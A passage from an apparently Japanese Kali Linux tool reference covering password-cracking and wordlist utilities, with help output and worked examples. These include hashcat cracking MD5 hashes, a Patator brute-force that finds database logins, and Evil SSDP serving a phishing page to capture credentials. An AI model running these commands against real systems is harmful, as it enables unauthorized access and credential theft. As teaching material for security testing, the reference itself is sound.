Save masks to a file
--showmasks Show matching masks
Individual Mask Filter Options:
--minlength=8 Minimum password length
--maxlength=8 Maximum password length
--mintime=3600 Minimum mask runtime (seconds)
--maxtime=3600 Maximum mask runtime (seconds)
--mincomplexity=1 Minimum complexity
--maxcomplexity=100
Maximum complexity
--minoccurrence=1 Minimum occurrence
--maxoccurrence=100
Maximum occurrence
Mask Sorting Options:
--optindex sort by mask optindex (default)
--occurrence sort by mask occurrence
--complexity sort by mask complexity
Check mask coverage:
--checkmasks=?u?l?l?l?l?l?d,?l?l?l?l?l?d?d
check mask coverage
--checkmasksfile=masks.hcmask
check mask coverage in a file
Miscellaneous options:
--pps=1000000000 Passwords per Second
-q, --quiet Don\'t show headers.
root@kali:~# policygen --help
Usage: policygen [options]
Type --help for more options
Options:
--version show program\'s version number and exit
-h, --help show this help message and exit
-o masks.hcmask, --outputmasks=masks.hcmask
Save masks to a file
--pps=1000000000 Passwords per Second
--showmasks Show matching masks
--noncompliant Generate masks for noncompliant passwords
-q, --quiet Don\'t show headers.
Password Policy:
Define the minimum (or maximum) password strength policy that you
would like to test
--minlength=8 Minimum password length
--maxlength=8 Maximum password length
--mindigit=1 Minimum number of digits
--minlower=1 Minimum number of lower-case characters
--minupper=1 Minimum number of upper-case characters
--minspecial=1 Minimum number of special characters
--maxdigit=3 Maximum number of digits
--maxlower=3 Maximum number of lower-case characters
--maxupper=3 Maximum number of upper-case characters
--maxspecial=3 Maximum number of special characters
root@kali:~# rulegen --help
Usage: rulegen [options] passwords.txt
Options:
--version show program\'s version number and exit
-h, --help show this help message and exit
-b rockyou, --basename=rockyou
Output base name. The following files will be
generated: basename.words, basename.rules and
basename.stats
-w wiki.dict, --wordlist=wiki.dict
Use a custom wordlist for rule analysis.
-q, --quiet Don\'t show headers.
--threads=THREADS Parallel threads to use for processing.
Fine tune source word generation::
--maxworddist=10 Maximum word edit distance (Levenshtein)
--maxwords=5 Maximum number of source word candidates to consider
--morewords Consider suboptimal source word candidates
--simplewords Generate simple source words for given passwords
Fine tune rule generation::
--maxrulelen=10 Maximum number of operations in a single rule
--maxrules=5 Maximum number of rules to consider
--morerules Generate suboptimal rules
--simplerules Generate simple rules insert,delete,replace
--bruterules Bruteforce reversal and rotation rules (slow)
Fine tune spell checker engine::
--providers=aspell,myspell
Comma-separated list of provider engines
Debuggin options::
-v, --verbose Show verbose information.
-d, --debug Debug rules.
--password Process the last argument as a password not a file.
--word=Password Use a custom word for rule analysis
--hashcat Test generated rules with hashcat-cli
■ 使用例
# パスワードリストからマスクを作成
root@kali:~# statsgen 2023-200_most_used_passwords.txt -o most_used_passwords.masks --hiderare -q
[*] Analyzing passwords in [2023-200_most_used_passwords.txt]
[*] Saving advanced masks and occurrences to [most_used_passwords.masks]
[+] Analyzing 100% (200/200) of passwords
[*] Statistics below is relative to the number of analyzed passwords, not total number of passwords
[*] Length:
[+] 8: 32% (65)
[+] 6: 18% (37)
[+] 9: 16% (33)
[+] 10: 10% (20)
[+] 7: 06% (12)
[...]
[*] Character-set:
[+] numeric: 31% (62)
[+] loweralphanum: 26% (52)
[+] loweralpha: 18% (37)
[+] mixedalphanum: 09% (18)
[+] all: 09% (18)
[...]
[*] Simple Masks:
[+] digit: 31% (62)
[+] stringdigit: 23% (46)
[+] string: 21% (43)
[+] stringspecialdigit: 07% (14)
[+] digitstring: 06% (13)
[...]
[*] Advanced Masks:
[+] ?d?d?d?d?d?d: 10% (21)
[+] ?d?d?d?d?d?d?d?d: 05% (10)
[+] ?d?d?d?d?d?d?d?d?d?d: 04% (9)
[+] ?d?d?d?d?d?d?d?d?d: 04% (8)
[+] ?l?l?l?l?l?l?l?l: 04% (8)
[...]
# マスクを発生回数が多い順にソートしマスクの実行時間の合計が1時間程度になるように調整してHashcat用マスクを作成
root@kali:~# maskgen most_used_passwords.masks --occurrence --targettime 3600 -o most_used_passwords.hcmask --showmasks -q
[*] Analyzing masks in [most_used_passwords.masks]
[*] Saving generated masks to [most_used_passwords.hcmask]
[*] Using 1,000,000,000 keys/sec for calculations.
[*] Sorting masks by their [occurrence].
[L:] Mask: [ Occ: ] [ Time: ]
[ 6] ?d?d?d?d?d?d [21 ] [ 0:00:00]
[ 8] ?d?d?d?d?d?d?d?d [10 ] [ 0:00:00]
[10] ?d?d?d?d?d?d?d?d?d?d [9 ] [ 0:00:10]
[ 9] ?d?d?d?d?d?d?d?d?d [8 ] [ 0:00:01]
[ 8] ?l?l?l?l?l?l?l?l [8 ] [ 0:03:28]
[...]
# 作成したマスクを使ってMD5でハッシュ化したパスワードを解析
root@kali:~# echo -n "password" | md5sum | cut -d' ' -f1 > password.txt
root@kali:~# hashcat -a 3 -m 0 password.txt most_used_passwords.hcmask
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-Intel(R) Core(TM) i7-8565U CPU @ 1.80GHz, 2889/5842 MB (1024 MB allocatable), 8MCU
[...]
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 0 (MD5)
Hash.Target......: 5f4dcc3b5aa765d61d8327deb882cf99
Time.Started.....: Fri Nov 1 03:09:23 2024 (0 secs)
Time.Estimated...: Fri Nov 1 03:09:23 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: ?d?d?d?d?d?d [6]
[...]
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 0 (MD5)
Hash.Target......: 5f4dcc3b5aa765d61d8327deb882cf99
Time.Started.....: Fri Nov 1 03:09:24 2024 (57 secs)
Time.Estimated...: Fri Nov 1 03:10:21 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: ?d?d?d?d?d?d?d?d?d?d [10]
[...]
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 0 (MD5)
Hash.Target......: 5f4dcc3b5aa765d61d8327deb882cf99
Time.Started.....: Fri Nov 1 03:10:21 2024 (6 secs)
Time.Estimated...: Fri Nov 1 03:10:27 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: ?d?d?d?d?d?d?d?d?d [9]
[...]
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 0 (MD5)
Hash.Target......: 5f4dcc3b5aa765d61d8327deb882cf99
Time.Started.....: Fri Nov 1 03:09:23 2024 (1 sec)
Time.Estimated...: Fri Nov 1 03:09:24 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: ?d?d?d?d?d?d?d?d [8]
[...]
5f4dcc3b5aa765d61d8327deb882cf99:password
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 5f4dcc3b5aa765d61d8327deb882cf99
Time.Started.....: Fri Nov 1 03:10:27 2024 (2 secs)
Time.Estimated...: Fri Nov 1 03:10:29 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: ?l?l?l?l?l?l?l?l [8]
[...]
# パスワードリストからパスワードルールおよび単語リストを作成
root@kali:~# rulegen 2023-200_most_used_passwords.txt -b most_used_passwords -q
[*] Using Enchant 'aspell' module. For best results please install
'aspell' module language dictionaries.
[*] Analyzing passwords file: 2023-200_most_used_passwords.txt:
[...]
[*] Top 10 rules
[+] : - 24 (1.78%)
[+] $1 $2 $3 - 9 (0.67%)
[+] $@ $1 $2 $3 - 8 (0.59%)
[+] i4@ i51 i62 o73 - 6 (0.44%)
[+] $1 - 5 (0.37%)
[+] o2c se1 $2 $3 $4 - 4 (0.30%)
[+] o2c i41 se2 $3 $4 - 4 (0.30%)
[+] o2c i41 i52 se3 $4 - 4 (0.30%)
[+] o2c i41 i52 i63 o74 - 4 (0.30%)
[+] ss@ $1 $2 $3 - 4 (0.30%)
[*] Top 10 words
[+] admin - 8 (0.59%)
[+] Password - 8 (0.59%)
[+] qwerty - 8 (0.59%)
[+] admins - 8 (0.59%)
[+] Aah - 6 (0.44%)
[+] ab - 5 (0.37%)
[+] ac - 5 (0.37%)
[+] arc - 4 (0.30%)
[+] abs - 4 (0.30%)
[+] password - 4 (0.30%)
# 作成したパスワードルールと単語リストを使ってMD5でハッシュ化したパスワードを解析
root@kali:~# echo -n "password123" | md5sum | cut -d' ' -f1 > password.txt
root@kali:~# hashcat -a 0 -m 0 password.txt most_used_passwords-sorted.word -r most_used_passwords-sorted.rule
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-haswell-Intel(R) Core(TM) i7-8565U CPU @ 1.80GHz, 2889/5842 MB (1024 MB allocatable), 8MCU
[...]
482c811da5d5b4bc6d497ffa98491e38:password123
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 482c811da5d5b4bc6d497ffa98491e38
Time.Started.....: Fri Nov 1 04:03:57 2024 (0 secs)
Time.Estimated...: Fri Nov 1 04:03:57 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (most_used_passwords-sorted.word)
Guess.Mod........: Rules (most_used_passwords-sorted.rule)
[...]
Patator
多目的のブルートフォース攻撃ツールです。
■ 使用方法
root@kali:~# patator --help
Available modules:
+ ftp_login : Brute-force FTP
+ ssh_login : Brute-force SSH
+ telnet_login : Brute-force Telnet
+ smtp_login : Brute-force SMTP
+ smtp_vrfy : Enumerate valid users using SMTP VRFY
+ smtp_rcpt : Enumerate valid users using SMTP RCPT TO
+ finger_lookup : Enumerate valid users using Finger
+ http_fuzz : Brute-force HTTP
+ rdp_gateway : Brute-force RDP Gateway
+ ajp_fuzz : Brute-force AJP
+ pop_login : Brute-force POP3
+ pop_passd : Brute-force poppassd (http://netwinsite.com/poppassd/)
+ imap_login : Brute-force IMAP4
+ ldap_login : Brute-force LDAP
+ dcom_login : Brute-force DCOM
+ smb_login : Brute-force SMB
+ smb_lookupsid : Brute-force SMB SID-lookup
+ rlogin_login : Brute-force rlogin
+ vmauthd_login : Brute-force VMware Authentication Daemon
+ mssql_login : Brute-force MSSQL
+ oracle_login : Brute-force Oracle
+ mysql_login : Brute-force MySQL
+ mysql_query : Brute-force MySQL queries
+ rdp_login : Brute-force RDP (NLA)
+ pgsql_login : Brute-force PostgreSQL
+ vnc_login : Brute-force VNC
+ dns_forward : Forward DNS lookup
+ dns_reverse : Reverse DNS lookup
+ snmp_login : Brute-force SNMP v1/2/3
+ ike_enum : Enumerate IKE transforms
+ unzip_pass : Brute-force the password of encrypted ZIP files
+ keystore_pass : Brute-force the password of Java keystore files
+ sqlcipher_pass : Brute-force the password of SQLCipher-encrypted databases
+ umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes
+ tcp_fuzz : Fuzz TCP services
+ dummy_test : Testing module
■ 使用例
root@kali:~# patator pgsql_login host=192.168.11.4 user=FILE0 password=FILE1 0=usernames.txt 1=passwords.txt -x ignore:fgrep='password authentication failed for user' --rate-limit=1 --threads=20
12:28:44 patator INFO - Starting Patator 1.1-dev (https://github.com/lanjelot/patator) with python-3.12.6 at 2024-11-01 12:28 UTC
12:28:44 patator INFO -
12:28:44 patator INFO - code size time | candidate | num | mesg
12:28:44 patator INFO - -----------------------------------------------------------------------------
12:29:17 patator INFO - 0 2 0.012 | admin:admin123 | 624 | OK
12:29:27 patator INFO - 0 2 0.018 | admin2:admin123 | 826 | OK
12:46:27 patator INFO - 0 2 0.017 | guest:password | 21015 | OK
13:01:55 patator INFO - 0 2 0.009 | postgres:postgres | 39389 | OK
13:17:14 patator INFO - 0 2 0.012 | test:password | 57577 | OK
13:26:15 patator INFO - Hits/Done/Skip/Fail/Size: 5/68276/0/0/68276, Avg: 19 r/s, Time: 0h 57m 30s
PDFCrack
パスワードで保護されたPDFファイルのパスワードを探索します。
■ 使用方法
root@kali:~# pdfcrack
Usage: pdfcrack -f filename [OPTIONS]
OPTIONS:
-b, --bench perform benchmark and exit
-c, --charset=STRING Use the characters in STRING as charset
-w, --wordlist=FILE Use FILE as source of passwords to try
-n, --minpw=INTEGER Skip trying passwords shorter than this
-m, --maxpw=INTEGER Stop when reaching this passwordlength
-l, --loadState=FILE Continue from the state saved in FILENAME
-o, --owner Work with the ownerpassword
-u, --user Work with the userpassword (default)
-p, --password=STRING Give userpassword to speed up breaking
ownerpassword (implies -o)
-q, --quiet Run quietly
-s, --permutate Try permutating the passwords (currently only
supports switching first character to uppercase)
-v, --version Print version and exit
■ 使用例
root@kali:~# pdfcrack -f sample.pdf -w passwords.txt
PDF version 1.7
Security Handler: Standard
V: 2
R: 3
P: -3392
Length: 128
Encrypted Metadata: True
FileID: 7d422a8836bbb2110a0067458b6bc623
U: 02c65c4c0d2f0ada15776dfde8cf416700000000000000000000000000000000
O: 71638af5d20eac2561e2a5fc84d77b73920585281473e90018fcff35671afabe
found user-password: 'hello'
Pipal
パスワードリストを分析してどのようなパスワードが多いのかなどの傾向を表示します。
■ 使用方法
root@kali:~# pipal --help
Usage: pipal [OPTION] ... FILENAME
--help, -h, -?: show help
--top, -t X: show the top X results (default 10)
--output, -o <filename>: output to file
--gkey <Google Maps API key>: to allow zip code lookups (optional)
--list-checkers: Show the available checkers and which are enabled
--verbose, -v: Verbose
■ 使用例
root@kali:~# pipal rockyou.txt
Generating stats, hit CTRL-C to finish early and dump stats on words already processed.
Please wait...
[...]
Basic Results
Total entries = 14344162
Total unique entries = 14343689
Top 10 passwords
love = 4 (0.0%)
1234567 = 3 (0.0%)
butterfly = 3 (0.0%)
[...]
Top 10 base words
love = 9829 (0.07%)
angel = 4845 (0.03%)
june = 4347 (0.03%)
[...]
Password length (count ordered)
8 = 2967049 (20.68%)
7 = 2507218 (17.48%)
9 = 2191547 (15.28%)
[...]
One to six characters = 2230094 (15.55%)
One to eight characters = 7704361 (53.71%)
More than eight characters = 6639801 (46.29%)
Only lowercase alpha = 3726656 (25.98%)
Only uppercase alpha = 229893 (1.6%)
Only alpha = 3956549 (27.58%)
Only numeric = 2346842 (16.36%)
First capital last symbol = 38828 (0.27%)
First capital last number = 653713 (4.56%)
Single digit on the end = 1180546 (8.23%)
Two digits on the end = 2059621 (14.36%)
Three digits on the end = 865023 (6.03%)
[...]
Character sets
loweralphanum: 6075055 (42.35%)
loweralpha: 3726656 (25.98%)
numeric: 2346842 (16.36%)
upperalphanum: 407436 (2.84%)
[...]
Character sets
loweralphanum: 6075055 (42.35%)
loweralpha: 3726656 (25.98%)
numeric: 2346842 (16.36%)
upperalphanum: 407436 (2.84%)
[...]
princeprocessor
PRINCE (PRobability INfinite Chained Elements)というパスワード推測アルゴリズムを使用してパスワードリストを生成します。
■ 使用方法
root@kali:~# princeprocessor --help
Usage: princeprocessor [options] [<] wordlist
* Startup:
-V, --version Print version
-h, --help Print help
* Misc:
--keyspace Calculate number of combinations
* Optimization:
--pw-min=NUM Print candidate if length is greater than NUM
--pw-max=NUM Print candidate if length is smaller than NUM
--elem-cnt-min=NUM Minimum number of elements per chain
--elem-cnt-max=NUM Maximum number of elements per chain
--wl-dist-len Calculate output length distribution from wordlist
--wl-max=NUM Load only NUM words from input wordlist or use 0 to disable
-c, --dupe-check-disable Disable dupes check for faster initial load
--save-pos-disable Save the position for later resume with -s
* Resources:
-s, --skip=NUM Skip NUM passwords from start (for distributed)
-l, --limit=NUM Limit output to NUM passwords (for distributed)
* Files:
-o, --output-file=FILE Output-file
* Amplifier:
--case-permute For each word in the wordlist that begins with a letter
generate a word with the opposite case of the first letter
■ 使用例
root@kali:~# echo -e "hello\nworld\n1234" | princeprocessor --elem-cnt-max 2
hello
world
1234
12341234
1234hello
1234world
hello1234
world1234
hellohello
worldhello
helloworld
worldworld
rling
パスワードリストなどのファイルから重複行を削除します。hashcat-utilsのrliコマンドより高速に動作します。
■ 使用方法
root@kali:~# rling --help
rling: unrecognized option '--help'
rling version: 1.74 2020/08/24 14:25:43 dlr Exp dlr $
rling - remove matching lines from a file
rling input output [remfil1 remfile2 ...]
-i Ignore any error/missing files on remove list
-d Removes duplicate lines from input (on by default)
-D file Write duplicates to file
-n Do not remove duplicate lines from input
-c Output lines common to input and remove files
-s Sort output. Default is input order.
This will make the -b and -f options substantially faster
-t number Number of threads to use
-p prime Force size of hash table
-b Use binary search vs hash (slower, but less memory)
-2 Use rli2 mode - all files must be sorted. Low mem usage.
-f Use files instead of memory (slower, but small memory)
-l [len] Limit all matching to a specific length.
-M memsize Maximum memory to use for -f mode
-T path Directory to store temp files in
-q [cahwl] Do frequency analysis on input
a - all output, c - count, l - length, w - word,
s - running statistics, h - append histogram
Additional files will be matched against input files
-h This help
stdin and stdout can be used in the place of any filename
■ 使用例
# all-passwords.txtからignore-passwords.txtと重複するパスワードを削除してignore-passwords.txtを作成
root@kali:~# rling all-passwords.txt new-passwords.txt ignore-passwords.txt
Reading "all-passwords.txt"...3491 bytes total in 0.0001 seconds
Counting lines...Found 499 lines in 0.0004 seconds
Optimal HashPrime is 1543
Estimated memory required: 104,881,451 (100.02Mbytes)
Processing input list... 499 unique (0 duplicate lines) in 0.0014 seconds
Occupancy is 433/1543 28.0622%, Maxdepth=2
Removing from "ignore-passwords.txt"... 248 removed
248 total lines removed in 0.0003 seconds
Writing to "new-passwords.txt"
Wrote 251 lines in 0.0022 seconds
Total runtime 0.0045 seconds
root@kali:~# wc -l huge-passwords.txt
43033173 huge-passwords.txt
# huge-passwords.txtから重複行を削除
root@kali:~# rling huge-passwords.txt huge-passwords.txt
Reading "huge-passwords.txt"...419764491 bytes total in 0.1321 seconds
Counting lines...Found 43033173 lines in 0.1581 seconds
Optimal HashPrime is 100663319
Estimated memory required: 2,018,459,443 (1.88Gbytes)
Processing input list... 14344879 unique (28688294 duplicate lines) in 2.6272 seconds
Occupancy is 13369642/100663319 13.2815%, Maxdepth=4
0 total lines removed in 0.0000 seconds
Writing to "huge-passwords.txt"
Wrote 14,344,879 lines in 0.2657 seconds
Total runtime 3.1833 seconds
# 43033173行 -> 14344879行
root@kali:~# wc -l huge-passwords.txt
14344879 huge-passwords.txt
RSMangler
与えられた単語をもとに様々な組み合わせの単語を作成します。
■ 使用方法
root@kali:~# rsmangler --help
Basic usage:
rsmangler --file wordlist.txt
To pass the initial words in on standard in do:
cat wordlist.txt | rsmangler
To send the output to a file:
rsmangler --file wordlist.txt --output mangled.txt
All options are ON by default, these parameters turn them OFF
Usage: rsmangler [OPTION]
--help, -h: show help
--file, -f: the input file, use - for STDIN
--output, -o: the output file, use - for STDOUT
--max, -x: maximum word length
--min, -m: minimum word length
--perms, -p: permutate all the words
--double, -d: double each word
--reverse, -r: reverser the word
--leet, -t: l33t speak the word
--full-leet, -T: all posibilities l33t
--capital, -c: capitalise the word
--upper, -u: uppercase the word
--lower, -l: lowercase the word
--swap, -s: swap the case of the word
--ed, -e: add ed to the end of the word
--ing, -i: add ing to the end of the word
--punctuation: add common punctuation to the end of the word
--years, -y: add all years from 1990 to current year to start and end
--acronym, -a: create an acronym based on all the words entered in order and add to word list
--common, -C: add the following words to start and end: admin, sys, pw, pwd
--pna: add 01 - 09 to the end of the word
--pnb: add 01 - 09 to the beginning of the word
--na: add 1 - 123 to the end of the word
--nb: add 1 - 123 to the beginning of the word
--force: don\'t check output size
--space: add spaces between words
--allow-duplicates: allow duplicates in the output list
■ 使用例
root@kali:~# echo -e "hello\nworld" | rsmangler -d -r -t -T -c -u -l -s -e -i -y -a -C --pna --pnb --na --nb --punctuation --file -
hello
world
helloworld
worldhello
root@kali:~# echo -e "hello\nworld" | rsmangler -p -r -t -T -c -u -l -s -e -i -y -a -C --pna --pnb --na --nb --punctuation --file -
hellohello
worldworld
root@kali:~# echo -e "hello\nworld" | rsmangler -p -d -t -T -c -u -l -s -e -i -y -a -C --pna --pnb --na --nb --punctuation --file -
olleh
dlrow
root@kali:~# echo -e "hello\nworld" | rsmangler -p -d -r -t -c -u -l -s -e -i -y -a -C --pna --pnb --na --nb --punctuation --file -
h3110
h31!0
h3!10
h3!!0
w0r1d
w0r!d
root@kali:~# echo -e "hello\nworld" | rsmangler -p -d -r -t -T -c -u -l -s -e -i -a -C --pna --pnb --na --nb --punctuation --file -
1990hello
hello1990
1991hello
hello1991
[...]
2020world
world2020
root@kali:~# echo -e "hello\nworld" | rsmangler -p -d -r -t -T -c -u -l -s -e -i -y -C --pna --pnb --na --nb --punctuation --file -
hw
root@kali:~# echo -e "hello\nworld" | rsmangler -p -d -r -t -T -c -u -l -s -e -i -y -a --pna --pnb --na --nb --punctuation --file -
pwhello
hellopw
pwdhello
hellopwd
adminhello
helloadmin
syshello
hellosys
pwworld
worldpw
pwdworld
worldpwd
adminworld
worldadmin
sysworld
worldsys
root@kali:~# echo -e "hello\nworld" | rsmangler -p -d -r -t -T -c -u -l -s -e -i -y -a -C --pnb --na --nb --punctuation --file -
hello01
hello02
hello03
[...]
world09
root@kali:~# echo -e "hello\nworld" | rsmangler -p -d -r -t -T -c -u -l -s -e -i -y -a -C --pna --pnb --nb --punctuation --file -
hello1
hello2
[...]
hello122
hello123
world1
world2
[...]
world122
world123
Statsprocessor
マルコフ連鎖に基づいて単語リストを生成します。
■ 使用方法
root@kali:~# sp64 --help
Usage: sp64 [options]... hcstat-file [filter-mask]
* Startup:
-V, --version Print version
-h, --help Print help
* Increment:
--pw-min=NUM Start incrementing at NUM
--pw-max=NUM Stop incrementing at NUM
* Markov:
--markov-disable Emulates maskprocessor output
--markov-classic No per-position tables
--threshold=NUM Filter out chars after NUM chars added
Set to 0 to disable
* Misc:
--combinations Calculate number of combinations
--hex-charset Assume charset is given in hex
* Resources:
-s, --skip=NUM skip number of words (for restore)
-l, --limit=NUM limit number of words (for distributed)
* Files:
-o, --output-file=FILE Output-file
* Custom charsets:
-1, --custom-charset1=CS User-defineable charsets
-2, --custom-charset2=CS Example:
-3, --custom-charset3=CS --custom-charset1=?dabcdef
-4, --custom-charset4=CS sets charset ?1 to 0123456789abcdef
* Built-in charsets:
?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s = !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
?a = ?l?u?d?s
?h = 8 bit characters from 0xc0 - 0xff
?D = 8 bit characters from german alphabet
?F = 8 bit characters from french alphabet
?R = 8 bit characters from russian alphabet
■ 使用例
# ランダムな8桁の数字を100個作成
root@kali:~# for i in {1..100}; do echo $(openssl rand -base64 128 | tr -dc 0-9 | head -c 8); done > numbers.txt
# 作成した数字を使ってマルコフ統計を作成
root@kali:~# cat numbers.txt | /usr/lib/hashcat-utils/hcstatgen.bin hashcat.hcstat
# マルコフ統計をもとに8桁の数字のリストを作成
root@kali:~# sp64 --pw-min 8 --pw-max 8 hashcat.hcstat ?d?d?d?d?d?d?d?d > markov-numbers.txt
# 最初に作成した100個の数字からランダムに10個取り出してMD5でハッシュ化
root@kali:~# shuf numbers.txt | head -n 10 | while read line; do echo -n "$line" | md5sum | cut -d' ' -f1; done > hashes.txt
# 10個のハッシュ値を総当たりで解読
root@kali:~# hashcat -a 3 -m 0 --increment --increment-min 8 --increment-max 8 hashes.txt ?d?d?d?d?d?d?d?d
[...]
8c65bfebb42d551bd3adf126b28bffd0:62846032
a8006e2315a54e39f064110f3ca22cc5:13457221
cd8e82777c4f045ae4e9fca158a70ffc:82198660
ed1869c42c4c7babd7e22cd2a2555433:84409371
09cbd31095eb9d25e9317788b020ecc3:82526908
dda26fecefc8883c70bcfb40c2ea94b7:32256862
075baee80c111d843601e4d290db85f2:89107840
3443bb68543a58bcd871f358eacd0c38:85000872
1e5b8e6ddb9741cc7b9cc186fd72657e:06670396
8d280f181ee3695671669c09e9204350:87104346
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: hashes.txt
Time.Started.....: Tue Nov 19 04:13:28 2024 (0 secs)
Time.Estimated...: Tue Nov 19 04:13:28 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: ?d?d?d?d?d?d?d?d [8]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 184.2 MH/s (7.13ms) @ Accel:256 Loops:1000 Thr:1 Vec:8
Recovered........: 10/10 (100.00%) Digests (total), 10/10 (100.00%) Digests (new)
Progress.........: 73728000/100000000 (73.73%)
Rejected.........: 0/73728000 (0.00%)
Restore.Point....: 71680/100000 (71.68%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1000 Iteration:0-1000
Candidate.Engine.: Device Generator
Candidates.#1....: 12347537 -> 68860346
Started: Tue Nov 19 04:13:00 2024
Stopped: Tue Nov 19 04:13:30 2024
# 10個のハッシュ値をマルコフ統計をもとに作成したリストで解読
# キャッシュの構築があるため総当たりより時間が掛かっているが
# 総当たりは総数100000000に対して73.73%で解読完了なのに対して
# リストを使った場合は総数100000000に対して50.25%で完了
root@kali:~# hashcat -a 0 -m 0 hashes.txt markov-numbers.txt
[...]
Dictionary cache built:
* Filename..: markov-numbers.txt
* Passwords.: 100000000
* Bytes.....: 900000000
* Keyspace..: 100000000
* Runtime...: 7 secs
3443bb68543a58bcd871f358eacd0c38:85000872
1e5b8e6ddb9741cc7b9cc186fd72657e:06670396
a8006e2315a54e39f064110f3ca22cc5:13457221
dda26fecefc8883c70bcfb40c2ea94b7:32256862
09cbd31095eb9d25e9317788b020ecc3:82526908
cd8e82777c4f045ae4e9fca158a70ffc:82198660
8d280f181ee3695671669c09e9204350:87104346
8c65bfebb42d551bd3adf126b28bffd0:62846032
075baee80c111d843601e4d290db85f2:89107840
ed1869c42c4c7babd7e22cd2a2555433:84409371
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: hashes.txt
Time.Started.....: Tue Nov 19 04:19:44 2024 (17 secs)
Time.Estimated...: Tue Nov 19 04:20:01 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (markov-numbers.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2775.8 kH/s (0.24ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 10/10 (100.00%) Digests (total), 10/10 (100.00%) Digests (new)
Progress.........: 50245632/100000000 (50.25%)
Rejected.........: 0/50245632 (0.00%)
Restore.Point....: 50241536/100000000 (50.24%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 84919039 -> 84211496
Started: Tue Nov 19 04:19:12 2024
Stopped: Tue Nov 19 04:20:03 2024
WordlistRaider
単語リストから指定した条件にマッチする単語を抽出して新しいリストを作成します。
■ 使用方法
root@kali:~# wordlistraider --help
usage: wordlistraider [-h] -w path to source file -t path to the target file [--min MIN] [--max MAX] [-n NUMBERS] [-s SPECIALCHARACTERS]
options:
-h, --help show this help message and exit
-w path to source file, --wordlist path to source file
the wordlist to raid
-t path to the target file, --target path to the target file
the target wordlist
--min MIN, --minlength MIN
minimum length of password (default: 8)
--max MAX, --maxlength MAX
maximum length of password
-n NUMBERS, --numbers NUMBERS
password must include numbers (default: false)
-s SPECIALCHARACTERS, --specialcharacters SPECIALCHARACTERS
includes passwords with special characters (default: false)
■ 使用例
root@kali:~# cat rockyou.txt | wc -l
14344391
# アルファベットのみで構成される単語のリストを新たに作成
root@kali:~# wordlistraider -w rockyou.txt -t out.txt --min 8 --max 12
root@kali:~# cat out.txt | wc -l
106284
root@kali:~# head -n 5 out.txt
password
iloveyou
princess
babygirl
michelle
# アルファベットもしくは数字で構成される単語のリストを作成
root@kali:~# wordlistraider -w rockyou.txt -t out.txt --min 8 --max 12 --numbers true
root@kali:~# cat out.txt | wc -l
255013
root@kali:~# head -n 5 out.txt
123456789
password
iloveyou
princess
12345678
Social Engineering
Evil SSDP
SSDP(Simple Service Discovery Protocol)レスポンスを偽装して偽のUPnPデバイスを作成し、標的の認証情報などを窃取します。
■ 使用方法
root@kali:~# evil-ssdp --help
usage: evil_ssdp.py [-h] [-p PORT] [-t TEMPLATE] [-s SMB] [-b] [-r REALM] [-u URL] [-a] interface
positional arguments:
interface Network interface to listen on.
options:
-h, --help show this help message and exit
-p PORT, --port PORT Port for HTTP server. Defaults to 8888.
-t TEMPLATE, --template TEMPLATE
Name of a folder in the templates directory. Defaults to "office365". This will determine xml and phishing pages used.
-s SMB, --smb SMB IP address of your SMB server. Defalts to the primary address of the "interface" provided.
-b, --basic Enable base64 authentication for templates and write credentials to log file.
-r REALM, --realm REALM
Realm when prompting target for authentication via Basic Auth.
-u URL, --url URL Redirect to this URL. Works with templates that do a POST for logon forms and with templates that include the custom redirect JavaScript
(see README for more info).[example: -r https://google.com]
-a, --analyze Run in analyze mode. Will NOT respond to any SSDP queries, but will still enable and run the web server for testing.
■ 使用例
root@kali:~# evil-ssdp eth0 -t office365
[...]
########################################
[*] EVIL TEMPLATE: /usr/share/evil-ssdp/templates/office365
[*] MSEARCH LISTENER: eth0
[*] DEVICE DESCRIPTOR: http://192.168.11.3:8888/ssdp/device-desc.xml
[*] SERVICE DESCRIPTOR: http://192.168.11.3:8888/ssdp/service-desc.xml
[*] PHISHING PAGE: http://192.168.11.3:8888/ssdp/present.html
[*] SMB POINTER: file://///192.168.11.3/smb/hash.jpg
########################################
[M-SEARCH] New Host 192.168.11.4, Service Type: upnp:rootdevice
[M-SEARCH] New Host 192.168.11.4, Service Type: urn:schemas-wifialliance-org:device:WFADevice:1
[XML REQUEST] Host: 192.168.11.4, User-Agent: FDSSDP
GET /ssdp/device-desc.xml
